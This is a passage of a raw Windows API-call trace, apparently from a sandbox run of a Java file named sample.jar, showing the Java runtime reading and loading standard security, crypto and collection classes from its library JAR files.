lpBuffer=0x12324cd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b970, lpOverlapped=0x0 | out: lpBuffer=0x12324cd0*, lpNumberOfBytesRead=0x208b970*=0xa0, lpOverlapped=0x0) returned 1 [0109.436] malloc (_Size=0x27) returned 0x12ecef50 [0109.440] strlen (_Str="java/security/spec/ECPoint") returned 0x1a [0109.441] strlen (_Str="java/security/spec/ECPoint.class") returned 0x20 [0109.441] malloc (_Size=0x48) returned 0x12ed31b0 [0109.441] malloc (_Size=0xa0) returned 0x12324960 [0109.441] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33343a3, lpNewFilePointer=0x208b9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9a0*=53691299) returned 1 [0109.441] ReadFile (in: hFile=0x134, lpBuffer=0x12324960, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b970, lpOverlapped=0x0 | out: lpBuffer=0x12324960*, lpNumberOfBytesRead=0x208b970*=0xa0, lpOverlapped=0x0) returned 1 [0109.441] malloc (_Size=0x21) returned 0x12ecf0d0 [0109.448] strlen (_Str="sun/security/ec/NamedCurve") returned 0x1a [0109.448] strlen (_Str="sun/security/ec/NamedCurve.class") returned 0x20 [0109.449] strlen (_Str="sun/security/ec/NamedCurve.class") returned 0x20 [0109.449] strlen (_Str="sun/security/ec/NamedCurve.class") returned 0x20 [0109.450] malloc (_Size=0x48) returned 0x12ed32a0 [0109.450] malloc (_Size=0xa0) returned 0x12324b70 [0109.450] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x9dfc, lpNewFilePointer=0x208aec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aec0*=40444) returned 1 [0109.451] ReadFile (in: hFile=0x2cc, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ae90, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208ae90*=0xa0, lpOverlapped=0x0) returned 1 [0109.451] malloc (_Size=0x21) returned 0x12ecf130 [0109.451] free (_Block=0x12ec26d0) [0109.452] free (_Block=0x1228e6e0) [0109.454] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x1f9a, lpNewFilePointer=0x2089060, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089060*=8090) returned 1 [0109.455] ReadFile (in: hFile=0x2cc, lpBuffer=0x20890b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089030, lpOverlapped=0x0 | out: lpBuffer=0x20890b0*, lpNumberOfBytesRead=0x2089030*=0x1e, lpOverlapped=0x0) returned 1 [0109.455] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x1fd8, lpNewFilePointer=0x20890c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20890c0*=8152) returned 1 [0109.455] ReadFile (in: hFile=0x2cc, lpBuffer=0x20891d0, nNumberOfBytesToRead=0x338, lpNumberOfBytesRead=0x2089090, lpOverlapped=0x0 | out: lpBuffer=0x20891d0*, lpNumberOfBytesRead=0x2089090*=0x338, lpOverlapped=0x0) returned 1 [0109.456] malloc (_Size=0x669) returned 0x12ec7f20 [0109.460] strlen (_Str="java/security/spec/ECParameterSpec") returned 0x22 [0109.460] strlen (_Str="java/security/spec/ECParameterSpec.class") returned 0x28 [0109.460] malloc (_Size=0x48) returned 0x12ed3bb0 [0109.461] malloc (_Size=0xa0) returned 0x123245f0 [0109.461] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x333434d, lpNewFilePointer=0x2089520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089520*=53691213) returned 1 [0109.461] ReadFile (in: hFile=0x134, lpBuffer=0x123245f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x20894f0, lpOverlapped=0x0 | out: lpBuffer=0x123245f0*, lpNumberOfBytesRead=0x20894f0*=0xa0, lpOverlapped=0x0) returned 1 [0109.461] malloc (_Size=0x29) returned 0x12ed5af0 [0109.466] free (_Block=0x12ec7f20) [0109.469] strlen (_Str="java/io/IOException") returned 0x13 [0109.476] strlen (_Str="sun/security/util/DerOutputStream") returned 0x21 [0109.530] strlen (_Str="sun/security/util/ObjectIdentifier") returned 0x22 [0109.532] strlen (_Str="java/lang/String") returned 0x10 [0109.534] strlen (_Str="java/lang/Integer") returned 0x11 [0109.606] strlen (_Str="java/security/spec/ECFieldF2m") returned 0x1d [0109.607] strlen (_Str="java/security/spec/ECFieldF2m.class") returned 0x23 [0109.607] malloc (_Size=0x48) returned 0x12ed3bb0 [0109.607] malloc (_Size=0xa0) returned 0x12324330 [0109.607] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3334253, lpNewFilePointer=0x208b9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9a0*=53690963) returned 1 [0109.607] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b970, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b970*=0xa0, lpOverlapped=0x0) returned 1 [0109.607] malloc (_Size=0x24) returned 0x12ecf6a0 [0109.698] strlen (_Str="java/util/Collections") returned 0x15 [0109.700] strlen (_Str="java/util/Collection") returned 0x14 [0109.701] strlen (_Str="java/util/Collections$UnmodifiableCollection$1.class") returned 0x34 [0109.701] malloc (_Size=0x48) returned 0x12ed3de0 [0109.701] malloc (_Size=0xa0) returned 0x123243e0 [0109.701] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415557, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=54613335) returned 1 [0109.701] ReadFile (in: hFile=0x134, lpBuffer=0x123243e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x123243e0*, lpNumberOfBytesRead=0x208cd10*=0xa0, lpOverlapped=0x0) returned 1 [0109.703] malloc (_Size=0x35) returned 0x12ed57b0 [0109.707] strlen (_Str="java/util/Iterator") returned 0x12 [0109.768] strlen (_Str="com/sun/net/ssl/internal/ssl/Provider") returned 0x25 [0109.769] strlen (_Str="com/sun/net/ssl/internal/ssl/Provider.class") returned 0x2b [0109.769] strlen (_Str="com/sun/net/ssl/internal/ssl/Provider.class") returned 0x2b [0109.769] malloc (_Size=0x48) returned 0x12ed3de0 [0109.769] malloc (_Size=0xa0) returned 0x12324330 [0109.769] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x8de53, lpNewFilePointer=0x208daa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208daa0*=581203) returned 1 [0109.769] ReadFile (in: hFile=0x2c4, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208da70, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208da70*=0xa0, lpOverlapped=0x0) returned 1 [0109.769] malloc (_Size=0x2c) returned 0x12ed5db0 [0109.781] strlen (_Str="sun/security/ssl/SunJSSE$1.class") returned 0x20 [0109.781] strlen (_Str="sun/security/ssl/SunJSSE$1.class") returned 0x20 [0109.781] malloc (_Size=0x48) returned 0x12ed3110 [0109.781] malloc (_Size=0xa0) returned 0x12324540 [0109.781] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x90fe8, lpNewFilePointer=0x208cda0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cda0*=593896) returned 1 [0109.781] ReadFile (in: hFile=0x2c4, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd70, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208cd70*=0xa0, lpOverlapped=0x0) returned 1 [0109.781] malloc (_Size=0x21) returned 0x12eced70 [0109.800] strlen (_Str="com/sun/crypto/provider/SunJCE") returned 0x1e [0109.802] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 0x3e [0109.802] malloc (_Size=0x88) returned 0x12ed6cc0 [0109.802] wcscpy (in: _Dest=0x12ed6cc0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" [0109.802] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar", nBufferLength=0x9, lpBuffer=0x208c7e8, lpFilePart=0x208c7e0 | out: lpBuffer="", lpFilePart=0x208c7e0*=0x0) returned 0x3f [0109.802] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar"), fInfoLevelId=0x0, lpFileInformation=0x208c580 | out: lpFileInformation=0x208c580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3ec780, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3ec780, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3edb58, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x43d4a)) returned 1 [0109.803] free (_Block=0x12ed6cc0) [0109.803] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 0x3e [0109.803] malloc (_Size=0x88) returned 0x12ed6cc0 [0109.803] wcscpy (in: _Dest=0x12ed6cc0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" [0109.803] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x2d0 [0109.803] GetFileTime (in: hFile=0x2d0, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208c6e8 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208c6e8*(dwLowDateTime=0xeb3edb58, dwHighDateTime=0x1d709ec)) returned 1 [0109.803] CloseHandle (hObject=0x2d0) returned 1 [0109.804] free (_Block=0x12ed6cc0) [0109.804] malloc (_Size=0x3f) returned 0x12ed3f70 [0109.804] _errno () returned 0x20f6be0 [0109.804] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 0x3e [0109.804] strcpy (in: _Dest=0x208c2a0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" [0109.804] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 1 [0109.804] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned -1 [0109.804] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned -1 [0109.804] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar", _Str2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned -1 [0109.804] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned -1 [0109.804] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 0x3e [0109.804] malloc (_Size=0x88) returned 0x12ed71d0 [0109.804] wcscpy (in: _Dest=0x12ed71d0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" [0109.804] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0109.805] free (_Block=0x12ed71d0) [0109.806] calloc (_Count=0x1, _Size=0xa8) returned 0x12324ee0 [0109.806] ReadFile (in: hFile=0x2d0, lpBuffer=0x208c580, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x208c530, lpOverlapped=0x0 | out: lpBuffer=0x208c580*, lpNumberOfBytesRead=0x208c530*=0x4, lpOverlapped=0x0) returned 1 [0109.809] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x208c560, dwMoveMethod=0x2 | out: lpNewFilePointer=0x208c560*=277834) returned 1 [0109.810] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x43cca, lpNewFilePointer=0x208c330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c330*=277706) returned 1 [0109.810] ReadFile (in: hFile=0x2d0, lpBuffer=0x208c390, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x208c300, lpOverlapped=0x0 | out: lpBuffer=0x208c390*, lpNumberOfBytesRead=0x208c300*=0x80, lpOverlapped=0x0) returned 1 [0109.814] malloc (_Size=0x48) returned 0x12ed34d0 [0109.814] malloc (_Size=0xa0) returned 0x12324540 [0109.814] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f4e5, lpNewFilePointer=0x208cfc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cfc0*=259301) returned 1 [0109.814] ReadFile (in: hFile=0x2d0, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cf90, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208cf90*=0xa0, lpOverlapped=0x0) returned 1 [0109.814] malloc (_Size=0x25) returned 0x12ecf700 [0109.815] malloc (_Size=0x48) returned 0x12ed3520 [0109.816] malloc (_Size=0xa0) returned 0x12324070 [0109.816] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f2b5, lpNewFilePointer=0x208ce20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce20*=258741) returned 1 [0109.816] ReadFile (in: hFile=0x2d0, lpBuffer=0x12324070, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cdf0, lpOverlapped=0x0 | out: lpBuffer=0x12324070*, lpNumberOfBytesRead=0x208cdf0*=0xa0, lpOverlapped=0x0) returned 1 [0109.816] malloc (_Size=0x15) returned 0x12ed16c0 [0109.816] free (_Block=0x12ecf700) [0109.817] free (_Block=0x12ed34d0) [0109.817] calloc (_Count=0x1, _Size=0x58) returned 0x12ec4ee0 [0109.817] malloc (_Size=0x1bf0) returned 0x12ed74a0 [0109.820] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x208b050, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b050*=0) returned 1 [0109.820] ReadFile (in: hFile=0x2d0, lpBuffer=0x208b0a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b020, lpOverlapped=0x0 | out: lpBuffer=0x208b0a0*, lpNumberOfBytesRead=0x208b020*=0x1e, lpOverlapped=0x0) returned 1 [0109.820] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x32, lpNewFilePointer=0x208b0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b0b0*=50) returned 1 [0109.820] ReadFile (in: hFile=0x2d0, lpBuffer=0x208b1c0, nNumberOfBytesToRead=0x17c6, lpNumberOfBytesRead=0x208b080, lpOverlapped=0x0 | out: lpBuffer=0x208b1c0*, lpNumberOfBytesRead=0x208b080*=0x17c6, lpOverlapped=0x0) returned 1 [0109.820] malloc (_Size=0x8000) returned 0x12edede0 [0109.934] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x32, lpNewFilePointer=0x208afb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208afb0*=50) returned 1 [0109.934] ReadFile (in: hFile=0x2d0, lpBuffer=0x208b0c0, nNumberOfBytesToRead=0x17c6, lpNumberOfBytesRead=0x208af80, lpOverlapped=0x0 | out: lpBuffer=0x208b0c0*, lpNumberOfBytesRead=0x208af80*=0x17c6, lpOverlapped=0x0) returned 1 [0109.937] malloc (_Size=0x48) returned 0x12ed3bb0 [0109.937] malloc (_Size=0xa0) returned 0x12324070 [0109.937] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f2f7, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=258807) returned 1 [0109.937] ReadFile (in: hFile=0x2d0, lpBuffer=0x12324070, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x12324070*, lpNumberOfBytesRead=0x208cd60*=0xa0, lpOverlapped=0x0) returned 1 [0109.937] malloc (_Size=0x15) returned 0x12edcfd0 [0109.938] free (_Block=0x12ed16c0) [0109.938] free (_Block=0x12ed3520) [0109.939] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1808, lpNewFilePointer=0x208af50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208af50*=6152) returned 1 [0109.939] ReadFile (in: hFile=0x2d0, lpBuffer=0x208afa0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208af20, lpOverlapped=0x0 | out: lpBuffer=0x208afa0*, lpNumberOfBytesRead=0x208af20*=0x1e, lpOverlapped=0x0) returned 1 [0109.939] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x183a, lpNewFilePointer=0x208afb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208afb0*=6202) returned 1 [0109.939] ReadFile (in: hFile=0x2d0, lpBuffer=0x208b0c0, nNumberOfBytesToRead=0x178f, lpNumberOfBytesRead=0x208af80, lpOverlapped=0x0 | out: lpBuffer=0x208b0c0*, lpNumberOfBytesRead=0x208af80*=0x178f, lpOverlapped=0x0) returned 1 [0109.942] malloc (_Size=0x48) returned 0x12ed3520 [0109.942] malloc (_Size=0xa0) returned 0x123245f0 [0109.942] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f339, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=258873) returned 1 [0109.942] ReadFile (in: hFile=0x2d0, lpBuffer=0x123245f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x123245f0*, lpNumberOfBytesRead=0x208cd60*=0xa0, lpOverlapped=0x0) returned 1 [0109.942] malloc (_Size=0x16) returned 0x12edcdf0 [0109.943] free (_Block=0x12edcfd0) [0109.943] free (_Block=0x12ed3bb0) [0109.944] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2fd9, lpNewFilePointer=0x208af50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208af50*=12249) returned 1 [0109.944] ReadFile (in: hFile=0x2d0, lpBuffer=0x208afa0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208af20, lpOverlapped=0x0 | out: lpBuffer=0x208afa0*, lpNumberOfBytesRead=0x208af20*=0x1e, lpOverlapped=0x0) returned 1 [0109.944] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x300c, lpNewFilePointer=0x208afb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208afb0*=12300) returned 1 [0109.944] ReadFile (in: hFile=0x2d0, lpBuffer=0x208b0c0, nNumberOfBytesToRead=0x527, lpNumberOfBytesRead=0x208af80, lpOverlapped=0x0 | out: lpBuffer=0x208b0c0*, lpNumberOfBytesRead=0x208af80*=0x527, lpOverlapped=0x0) returned 1 [0110.116] malloc (_Size=0x48) returned 0x12ed3bb0 [0110.116] malloc (_Size=0xa0) returned 0x12324b70 [0110.116] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f4e5, lpNewFilePointer=0x208ce90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce90*=259301) returned 1 [0110.116] ReadFile (in: hFile=0x2d0, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce60, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208ce60*=0xa0, lpOverlapped=0x0) returned 1 [0110.116] malloc (_Size=0x25) returned 0x12ecf730 [0110.118] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x523f, lpNewFilePointer=0x208b160, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b160*=21055) returned 1 [0110.119] ReadFile (in: hFile=0x2d0, lpBuffer=0x208b1b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b130, lpOverlapped=0x0 | out: lpBuffer=0x208b1b0*, lpNumberOfBytesRead=0x208b130*=0x1e, lpOverlapped=0x0) returned 1 [0110.119] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x5281, lpNewFilePointer=0x208b1c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b1c0*=21121) returned 1 [0110.119] ReadFile (in: hFile=0x2d0, lpBuffer=0x208b2d0, nNumberOfBytesToRead=0x3bc, lpNumberOfBytesRead=0x208b190, lpOverlapped=0x0 | out: lpBuffer=0x208b2d0*, lpNumberOfBytesRead=0x208b190*=0x3bc, lpOverlapped=0x0) returned 1 [0110.119] free (_Block=0x12edcdf0) [0110.120] free (_Block=0x12ed3520) [0110.122] malloc (_Size=0x75e) returned 0x12ede1c0 [0110.127] free (_Block=0x12ede1c0) [0110.133] strlen (_Str="com/sun/crypto/provider/SunJCE$1") returned 0x20 [0110.135] malloc (_Size=0x48) returned 0x12ed3fc0 [0110.135] malloc (_Size=0xa0) returned 0x12324b70 [0110.135] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x42864, lpNewFilePointer=0x208b9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9a0*=272484) returned 1 [0110.136] ReadFile (in: hFile=0x2d0, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b970, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208b970*=0xa0, lpOverlapped=0x0) returned 1 [0110.136] malloc (_Size=0x27) returned 0x12ee6f30 [0110.137] free (_Block=0x12ecf730) [0110.138] free (_Block=0x12ed3bb0) [0110.144] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2da91, lpNewFilePointer=0x2089b40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089b40*=187025) returned 1 [0110.145] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089b90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089b10, lpOverlapped=0x0 | out: lpBuffer=0x2089b90*, lpNumberOfBytesRead=0x2089b10*=0x1e, lpOverlapped=0x0) returned 1 [0110.145] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2dad5, lpNewFilePointer=0x2089ba0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089ba0*=187093) returned 1 [0110.145] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089cb0, nNumberOfBytesToRead=0x1a44, lpNumberOfBytesRead=0x2089b70, lpOverlapped=0x0 | out: lpBuffer=0x2089cb0*, lpNumberOfBytesRead=0x2089b70*=0x1a44, lpOverlapped=0x0) returned 1 [0110.151] malloc (_Size=0x680a) returned 0x12ee7e00 [0110.158] free (_Block=0x12ee7e00) [0110.271] strlen (_Str="java/util/LinkedHashSet.class") returned 0x1d [0110.271] malloc (_Size=0x48) returned 0x12ef34c0 [0110.271] malloc (_Size=0xa0) returned 0x12324330 [0110.271] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x333ce88, lpNewFilePointer=0x208dad0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dad0*=53726856) returned 1 [0110.271] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208daa0, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208daa0*=0xa0, lpOverlapped=0x0) returned 1 [0110.271] malloc (_Size=0x1e) returned 0x12ef08a0 [0110.279] strlen (_Str="java/util/LinkedHashMap$LinkedKeySet.class") returned 0x2a [0110.279] malloc (_Size=0x48) returned 0x12ef2fc0 [0110.279] malloc (_Size=0xa0) returned 0x12324b70 [0110.279] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33fc22d, lpNewFilePointer=0x208d9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9c0*=54510125) returned 1 [0110.279] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d990, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208d990*=0xa0, lpOverlapped=0x0) returned 1 [0110.279] malloc (_Size=0x2b) returned 0x12ef43d0 [0110.286] strlen (_Str="sun/security/provider/SecureRandom") returned 0x22 [0110.287] strlen (_Str="sun/security/provider/SecureRandom.class") returned 0x28 [0110.287] malloc (_Size=0x48) returned 0x12ef31f0 [0110.287] malloc (_Size=0xa0) returned 0x12324070 [0110.287] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dd0e1, lpNewFilePointer=0x208de90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de90*=54382817) returned 1 [0110.287] ReadFile (in: hFile=0x134, lpBuffer=0x12324070, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208de60, lpOverlapped=0x0 | out: lpBuffer=0x12324070*, lpNumberOfBytesRead=0x208de60*=0xa0, lpOverlapped=0x0) returned 1 [0110.288] malloc (_Size=0x29) returned 0x12ef4250 [0110.301] strlen (_Str="java/util/IdentityHashMap.class") returned 0x1f [0110.301] malloc (_Size=0x48) returned 0x12ef2fc0 [0110.301] malloc (_Size=0xa0) returned 0x12324330 [0110.301] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413542, lpNewFilePointer=0x208dc80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc80*=54605122) returned 1 [0110.301] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc50, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208dc50*=0xa0, lpOverlapped=0x0) returned 1 [0110.304] malloc (_Size=0x20) returned 0x12ef0a50 [0110.312] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\US_export_policy.jar") returned 0x44 [0110.312] malloc (_Size=0x94) returned 0x12ed52a0 [0110.312] wcscpy (in: _Dest=0x12ed52a0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\US_export_policy.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\US_export_policy.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\US_export_policy.jar" [0110.312] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\US_export_policy.jar", nBufferLength=0x9, lpBuffer=0x208def8, lpFilePart=0x208def0 | out: lpBuffer="", lpFilePart=0x208def0*=0x0) returned 0x45 [0110.312] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\security\\us_export_policy.jar"), fInfoLevelId=0x0, lpFileInformation=0x208dc90 | out: lpFileInformation=0x208dc90*(dwFileAttributes=0x208dd90, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x6f6031c7, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x119b0bf0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2101000, nFileSizeHigh=0x0, nFileSizeLow=0xeb68)) returned 0 [0110.312] GetLastError () returned 0x2 [0110.313] free (_Block=0x12ed52a0) [0110.314] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 0x2d [0110.314] malloc 